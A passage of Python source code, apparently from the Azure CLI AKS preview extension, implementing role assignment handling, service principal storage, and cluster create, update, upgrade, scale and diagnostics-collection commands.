else:
return False
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
_re_user_assigned_identity_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity
raise CLIError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
_re_snapshot_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.containerservice/snapshots/(.*)',
flags=re.IGNORECASE)
def _get_snapshot(cli_ctx, snapshot_id):
snapshot_id = snapshot_id.lower()
match = _re_snapshot_resource_id.search(snapshot_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
snapshot_name = match.group(3)
snapshot_client = cf_snapshots_client(cli_ctx, subscription_id=subscription_id)
try:
snapshot = snapshot_client.get(resource_group_name, snapshot_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise InvalidArgumentValueError("Snapshot {} not found.".format(snapshot_id))
raise CLIError(ex.message)
return snapshot
raise InvalidArgumentValueError(
"Cannot parse snapshot name from provided resource id {}.".format(snapshot_id))
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
from azure.cli.command_modules.acs.custom import _aks_browse
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser,
listen_address,
listen_port,
CUSTOM_MGMT_AKS_PREVIEW,
)
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def aks_maintenanceconfiguration_list(
cmd,
client,
resource_group_name,
cluster_name
):
return client.list_by_managed_cluster(resource_group_name, cluster_name)
def aks_maintenanceconfiguration_show(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.get(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_delete(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.delete(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_add(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
for config in configs:
if config.name == config_name:
raise CLIError("Maintenance configuration '{}' already exists, please try a different name, "
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_maintenanceconfiguration_update(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
found = False
for config in configs:
if config.name == config_name:
found = True
break
if not found:
raise CLIError("Maintenance configuration '{}' doesn't exist."
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
# pylint: disable=unused-argument,too-many-locals
def aks_create(cmd,
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_fips_image=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
pod_cidrs=None,
service_cidrs=None,
ip_families=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
min_count=None,
max_count=None,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
private_dns_zone=None,
enable_managed_identity=True,
fqdn_subdomain=None,
disable_public_fqdn=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
enable_sgxquotehelper=False,
kubelet_config=None,
linux_os_config=None,
http_proxy_config=None,
assign_identity=None,
auto_upgrade_channel=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
edge_zone=None,
enable_secret_rotation=False,
rotation_poll_interval=None,
disable_local_accounts=False,
no_wait=False,
assign_kubelet_identity=None,
workload_runtime=None,
gpu_instance_profile=None,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
snapshot_id=None,
enable_oidc_issuer=False,
yes=False):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewCreateDecorator
# decorator pattern
aks_create_decorator = AKSPreviewCreateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# construct mc profile
mc = aks_create_decorator.construct_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to create a real managed cluster
return aks_create_decorator.create_mc_preview(mc)
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
no_uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
disable_pod_identity=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
disable_local_accounts=False,
enable_local_accounts=False,
enable_public_fqdn=False,
disable_public_fqdn=False,
yes=False,
tags=None,
nodepool_labels=None,
windows_admin_password=None,
enable_azure_rbac=False,
disable_azure_rbac=False,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
enable_oidc_issuer=False):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewUpdateDecorator
# decorator pattern
aks_update_decorator = AKSPreviewUpdateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# update mc profile
mc = aks_update_decorator.update_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to update the real managed cluster
return aks_update_decorator.update_mc_preview(mc)
# pylint: disable=unused-argument
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None,
public_fqdn=False):
credentialResults = None
serverType = None
if public_fqdn:
serverType = 'public'
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name, serverType)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name, serverType)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(
resource_group_name, name, serverType)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(
cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError(
"A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import (is_valid_resource_id, parse_resource_id,
resource_id)
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(
cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(
cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
# Form containerName from fqdn, as it was previously jsut the location of code is changed.
# https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#container-names
maxContainerNameLength = 63
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_container_name = fqdn.replace('.', '-')
len_of_container_name = normalized_container_name.index("-hcp-")
if len_of_container_name == -1:
len_of_container_name = maxContainerNameLength
container_name = normalized_container_name[:len_of_container_name]
sas_token = sas_token.strip('?')
deployment_yaml = _read_periscope_yaml()
deployment_yaml = deployment_yaml.replace("# <accountName, string>", storage_account_name)
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <containerName, string>", container_name)
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(container_name)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Storage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def _read_periscope_yaml():
curr_dir = os.path.dirname(os.path.realpath(__file__))
periscope_yaml_file = os.path.join(curr_dir, "deploymentyaml", "aks-periscope.yaml")
yaml_file = open(periscope_yaml_file, "r")
data_loaded = yaml_file.read()
return data_loaded
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
aks_custom_headers=None,
yes=False):
from knack.prompting import prompt_y_n
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster " \
"and might take a while. Do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(
True, agent_pool_client, resource_group_name, name, agent_pool_profile.name, None)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
agent_profile.creation_data = None
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance, headers=headers)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name, snapshot_id=None):
headers = {}
if snapshot_id:
headers["AKSSnapshotId"] = snapshot_id
return sdk_no_wait(no_wait, client.begin_upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name, headers=headers)
def _handle_addons_args(cmd, # pylint: disable=too-many-statements
addons_str,
subscription_id,
resource_group_name,
addon_profiles=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
aci_subnet_name=None,
vnet_subnet_id=None,
enable_secret_rotation=False,
rotation_poll_interval=None,):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
